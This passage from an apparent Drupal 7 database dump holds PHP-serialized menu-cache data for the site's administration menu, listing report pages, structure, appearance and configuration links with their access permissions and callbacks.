(404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:298;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"298\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:402;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"402\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"402\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:403;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"403\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"403\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:404;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"404\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"404\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:405;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"405\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"405\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:411;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"411\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"411\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:416;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"416\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/adsense\";s:11:\"router_path\";s:21:\"admin/reports/adsense\";s:10:\"link_title\";s:14:\"AdSense clicks\";s:7:\"options\";s:71:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:21:\"Track AdSense clicks.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"416\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:29:\"a:1:{i:0;s:11:\"view clicks\";}\";s:13:\"page_callback\";s:17:\"adsense_click_log\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/adsense\";s:5:\"title\";s:14:\"AdSense clicks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:21:\"Track AdSense clicks.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:346;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"346\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:26:\"http://www.ollital.de/blog\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:58:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"346\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444940256,1),('links:management:tree-data:en:4cc3398422d20df3c6b4d912febf2bad7c81fb18649882abc3f7245b6c21dc06','a:2:{s:4:\"tree\";a:2:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer 